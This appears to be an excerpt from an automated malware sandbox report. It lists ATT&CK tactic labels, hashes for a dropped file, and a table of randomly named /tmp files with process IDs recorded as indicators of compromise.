T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	730	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	737	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	746	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	767	d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	790	sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	809	0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	815	TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	821	yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	835	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	857	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	869	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	878	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	884	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	890	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	896	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	902	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	908	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	915	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	921	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	927	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	933	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	939	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	945	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo